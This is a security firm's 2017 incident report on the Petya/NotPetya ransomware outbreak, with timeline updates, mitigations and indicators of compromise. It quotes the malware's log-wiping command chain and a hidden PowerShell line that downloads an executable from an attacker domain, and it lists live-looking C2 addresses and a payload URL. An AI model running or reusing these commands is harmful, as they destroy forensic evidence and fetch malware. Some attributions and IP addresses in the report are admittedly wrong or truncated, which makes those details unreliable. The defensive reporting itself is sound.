vSOC Spot Report – Petya – Ransomware Attack

Latest Updates

2017-06-27 18:31 EDT

As details continue to come in, there is evidence that today’s ransomware outbreak was actually two different campaigns that occurred at the same time. Some of the indicators originally attributed to the Petya malware were actually indicators belonging to the second campaign which is aptly being called, NotPetya.

Exploitation of the CVE-2017-0199 the myguys.xls file attachment, and the french-cooking[.]com domain name are all related to the NotPetya/Loki campaign which was a different kind of attack aimed at banking institutions.

GuidePoint’s vSOC reported on the Petya ransomware incident as events were unfolding. Due to our goal of reporting accurate information in a timely manner some of the original information included in our SPOT report and blog post was misattributed to the NotPetya/Loki campaign that was running simultaneously. The difference in these two campaigns was not known or understood initially. We have made every attempt to update this blog post with accurate information as it has been made available.

2017-06-27 17:55 EDT

Several different security researchers have identified a method of preventing the encryption of the disk by using any available method or technology to prevent C:\windows\perfc.dat from being written to disk or executed. This method does not stop the spread of the malware, just halts the encryption functions.

As of 1730 EDT the email provider for the attacker’s wowsmith123456@posteo.net email has closed the account. This affects the ability to pay the ransom if you are infected. New variants may provide a new method of payment.

2017-06-27 15:31 EDT

Connections to the initial outbreak of the Petya ransomware has been correlated to a compromised accounting software, MeDoc, popular with many large Ukrainian businesses as well as the Ukrainian Government. Attackers compromised the update code of a recent release which helped propagate the ransomware to many different companies. The update was released at 10:30AM GMT, about an hour before the initial surge of infections was observed.

2017-06-27 15:30 EDT

New information has been made available that provides further insight into how the Petya ransomware operates. If the permissions of the logged in user are not sufficient enough to write to the Master Boot Record (MBR) the malware will attempt to encrypt files based on their extension like more traditional ransomware.

The list of file types that are encrypted: 3ds, 7z, accdb, ai, asp, aspx, avhd, back, bak, c, cfg, conf, cpp, cs, ctl, dbf, disk, djvu, doc, docx, dwg, eml, fdb, gz, h, hdd, kdbx, mail, mdb, msg, nrg, ora, ost, ova, ovf, pdf, php, pmf, ppt, pptx, pst, pvi, py, pyc, rar, rtf, sln, sql, tar, vbox, vbs, vcb, vdi, vfd, vmc, vmdk, vmsd, vmx, vsdx, vsv, work, xls, xlsx, xvd, zip.

The malware also clears system security logs to prevent further analysis using the command:

wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D %c:

To further protect vulnerable systems it is advised to disallow the execution of the psexec.exe program if it is not needed or to disallow non-privileged users from executing psexec.exe via GPO or other endpoint mechanisms.

2017-06-27 15:20 EDT

Blocking lateral movement of the Petya variants of ransomware can be achieved by patching the EternalBlue vulnerability (Microsoft’s Critical Security Bulletin MS17-010) and by disabling Administrative Shares via Group Policy Object (GPO). To disable ADMIN$ shares use the below process:

Create a file named adminshares.adm with the content from below, under C:\windows\inf on the server you edit your GPO’s with.

CLASS MACHINE 
CATEGORY !!category1 
CATEGORY !!category2 
POLICY !!policyname 
EXPLAIN !!DefaultSharesExplain 
KEYNAME "System\CurrentControlSet\Services\LanManServer\Parameters\" 
VALUENAME "AutoShareWks" 
VALUEON NUMERIC 1 
VALUEOFF NUMERIC 0 
END POLICY 
END CATEGORY 
END CATEGORY 
[strings] 
category1="Network" 
category2="Sharing" 
policyname="AdministrativeShares" 
DefaultSharesExplain="Enables default workstation administrative shares if enabled or disables if disabled" 

 

Next, create a new GPO and right click on administrative templates, and add the administrative template you just created.

Click machine administrative templates, go into view filtering, unselect/uncheck “Only show policy settings that can be fully managed” the setting is shown in the top picture. Basically this allows the GPO Editor to show settings, that is not within the default area of registry “preferences” – like ours. Any settings done outside “preferences” will persist if the policy is removed, unlike standard policies.

Open Administrative Templates – Network – Sharing

Enable or disable administrative shares.

2017-06-27 14:11 EDT

On Tuesday June 27, 2017, accounts of a new ransomware campaign named Petya or Petwrap, are making headlines as infections hit Kiev, Ukraine at approximately 11:30 GMT and continued to spread throughout Russia, Spain, France, UK, India, and various other countries in Europe. The Petya ransomware variant does not encrypt individual files on an infected machine like WCrypt0r from May 2017. Rather, Petya reboots the computer and overwrites the Master Boot Record (MBR) in the boot sector of the hard drive with its code demanding ransom. Without the MBR, the operating system has no directions for where to find the files it needs to boot and run. This effectively renders the entire computer useless until the ransom, $300 in Bitcoin, is paid.

Today’s Petya variant infects machines through a Microsoft Office vulnerability (CVE-2017-0199) and then moves laterally throughout the network exploiting the EternalBlue SMBv1 file-sharing protocol vulnerability as described in Microsoft’s Critical Security Bulletin MS17-010. Patching these vulnerabilities is imperative and will significantly reduce or eliminate the ability of this ransomware to impact your organization.

The Petya ransomware first appeared in early 2016, but the variant spreading through Europe and Russia today contain new code and new functions. Most notable is the use of the EternalBlue exploit to infect machines. This variant is an evolution that has combined new tactics and procedures made famous in other malware campaigns seen in 2017.

Notable companies affected by the Petya ransomware attack include (at the time of this writing):

  • Danish Shipping Company, Maersk
  • British Advertising Company, WPP
  • Russian Oil Company, Rosneft
  • Ukrainian Power Companies, Kyivenergo and Ukrenergo
  • Ukrainian Banks, National Bank of Ukraine (NBU) and Oschadbank
  • Ukrainian Mining Company, Evraz
  • Ukrainian Telecomms, Kyivstar, LifeCell, and Ukrtelecom
  • Ukrainian Nuclear Power Plant, Chernobyl

At the time of publishing this vSOC SPOT Report, there have been no confirmed active connections to any of the known indicators associated with this Petya malware variant from any vSOC subscriber network.

vSOC has obtained rules for CarbonBlack and CrowdStrike to detect this infection; vSOC Protect clients with either of these solutions are protected and monitored for the Petya variants of ransomware. vSOC Detect clients are also being monitored for all available indicators of the Petya variants by your vSOC team.

Technical Analysis

Petya’s rapid propagation is believed to be linked to the use of the exact same EternalBlue exploit that the WanaCrypt0r malware used in May 2017; attacks against the vulnerable SMBv1 file-sharing protocol. EternalBlue was released to the public after being allegedly stolen from the National Security Agency (NSA) in April 2017.

Current evidence shows that these attacks began with malicious spam emails weaponized to use the EternalBlue exploit for Microsoft Office vulnerability CVE-2017-0199 over TCP ports 445, 135, and potentially 1024-1035.

Malicious emails originate from IPs 84.200.16.242, 95.141.115.108, 111.90.139.247, 185.165.29.78 which the attackers have registered to the domains delightcaf[.]xyz, french-cooking[.]com and coffeeinoffice[.]xyz.

The mal-spam variant of this attack is predominantly coming from 84.200.16.242/myguy[.]xls and 185.165.29.78/myguy[.]xls. All traffic to the Command and Control (C2) servers is currently using HTTP as the communication protocol.

Early reports indicate the botnet distributing this malware originates from the LokiBot network. Also, additional reports state the Mischa ransomware package is included in the Petya PE, however confirmation is still forthcoming.

Latest Indicators of Compromise

2017-06-127 15:20 EDT

File Names

These files are all accessed using the runtime process WINWORD.EXE (PID3008)

  • %APPDATA%\Microsoft\Office\Recent\Order-20062017.LNK
  • %APPDATA%\Microsoft\Office\Recent\index.dat
  • %APPDATA%\Microsoft\Templates\~$Normal.dotm
  • C:\~$der-20062017.doc@Please_Read_me@.txt
  • %LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.IE5\7N5LGTOO\myguy[1].hta
  • %LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1E328F26-90AD-432F-85D6-72D24D3FC842}.tmp
  • %LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8C06767A-F061-47F9-B88B-16AA8AA0D1F2}.tmp

Command and Control (C2)

  • 200.16.242/myguy[.]xls
  • 165.29.78/myguy[.]xls

Memory Strings

  • !”#$%&'()*+,-./0123456789:;<=>
  • “$(*.046:<“j.x\
  • (\{9%EZ”B%]V\XR){y%JWbj3jiDN}~Hl:x7
  • )|xA:X+Zp@w>v)7#% M+ANqR#mXf,934 qx$}&
  • /myguy.xls
  • /n “C:\Order-20062017.doc”
  • 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000105000000000000}}
  • 0000320a5802580201000400000000005202bc0220003600050000000902000000021c000000fb021000070000000000bc02000000000102022253797374656d0076f8032f0040311500bf05087640910b76fc7cb3044c311500040000002d010500040000002d01050004000000f0010300030000000000}{\result {
  • 1Pm\\9M2aD];Yt\[x]}Wr|]g-
  • 6iD_,|uZ^ty;!Y,}{C/h> PK ! dQ 1 word/_rels/document.xml.rels ( j0{-;@ $~

File Hash Values

  • 185.165.29.78
    • A809a63bc5e31670ff117d838522dc433f74bee
    • 078de2dc59ce59f503c63bd61f1ef8353dc7cf5f
    • bec678164cedea578a7aff4589018fa41551c27f
    • d5bf3f100e7dbcc434d7c58ebf64052329a60fc2
    • aba7aa41057c8a6b184ba5776c20f7e8fc97c657
    • 0ff07caedad54c9b65e5873ac2d81b3126754aac
    • 51eafbb626103765d3aedfd098b94d0e77de1196
  • 84.200.16.242
    • 7ca37b86f4acc702f108449c391dd2485b5ca18c
    • 2bc182f04b935c7e358ed9c9e6df09ae6af47168
    • 1b83c00143a1bb2bf16b46c01f36d53fb66f82b5
    • 82920a2ad0138a2a8efc744ae5849c6dde6b435d

Binary Details

The binary is currently signed using a certificate from Sysinternals. This will give a Certificate Name Mismatch error; however, the binary will still run in Windows. The current samples attempt to hijack an authorized session in order to spread using psexec. Several of the samples show the lateral movement functions are utilizing Windows Management Instrumentation Command-line (WMIC). Both are avenues for the malware to gain either local or Domain Administrator privileges allowing it to spread using that level of credential.

The sample was compiled for the i386 architecture specifically but appears to be functional on x64 architecture as well.

The PE imports the following DLL files for proper execution:

  • ADVAPI32.dll
  • CRYPT32.dll
  • DHCPSAPI.DLL
  • IPHLPAPI.DLL
  • KERNEL32.dll
  • MPR.dll
  • NETAPI32.dll
  • SHELL32.dll
  • SHLWAPI.dll
  • USER32.dll
  • WS2_32.dll
  • msvcrt.dll
  • ole32.dll

Powershell

The PE will attempt to execute the following script:

PowerShell -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile(‘http://french-cooking.com/myguy.exe’, ‘%APPDATA%\<random>.exe’)

The <random> variable is a random number between 0-65535, which it will then call with the arguments 1  0 (For example %APPDATA%\10254.exe 1 0).

Additional files dropped:

  • http[:]//185.165.29.78/~alex/svchost.exe

Extortioner Contact Info:

Mitigation

vSOC recommends immediately patching the vulnerabilities described in CVE-2017-0199  and MS17-010. However, unlike the previous WCrypt0r ransomware, patching alone will not prevent the spread of this malware. Petya’s code will attempt to use a variety of methods to propagate itself including the EternalBlue vulnerability, WMIC, and Powershell.

vSOC recommends that organizations:

References: